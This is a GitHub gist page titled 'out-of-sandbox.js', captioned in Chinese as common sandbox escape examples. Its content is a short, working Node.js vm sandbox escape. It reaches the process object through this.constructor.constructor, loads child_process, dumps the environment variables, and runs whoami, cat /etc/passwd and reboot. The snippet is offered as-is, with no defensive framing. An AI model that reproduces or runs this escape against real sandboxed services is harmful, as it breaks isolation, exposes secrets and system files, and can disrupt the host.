Skip to content

Instantly share code, notes, and snippets.

@vikiboss

vikiboss/out-of-sandbox.js

Last active February 14, 2023 04:14
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vikiboss/8815a8d236372a3c2de91bf4fa74bedb to your computer and use it in GitHub Desktop.
Save vikiboss/8815a8d236372a3c2de91bf4fa74bedb to your computer and use it in GitHub Desktop.
Download ZIP
沙盒逃逸常见例子
Raw
out-of-sandbox.js
this.constructor.constructor('return process')().mainModule.constructor._load('child_process').execSync('ls');
var exec = this.constructor.constructor;
var process = exec('return process')();
var require = process.mainModule.constructor._load;
var execSysCmd = require('child_process').execSync;
// process.exit();
console.log(process.env);
console.log(execSysCmd("whoami").toString());
console.log(execSysCmd("cat /etc/passwd").toString());
console.log(execSysCmd("reboot").toString());
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment